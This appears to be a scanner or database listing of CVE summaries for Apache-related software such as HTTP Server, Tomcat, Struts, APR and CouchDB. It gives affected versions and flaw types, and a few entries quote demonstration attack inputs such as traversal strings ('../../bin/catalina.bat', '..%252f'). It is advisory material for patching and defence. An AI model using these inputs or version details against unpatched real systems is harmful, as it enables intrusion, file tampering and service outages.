| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
6350| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
6351| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
6352| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
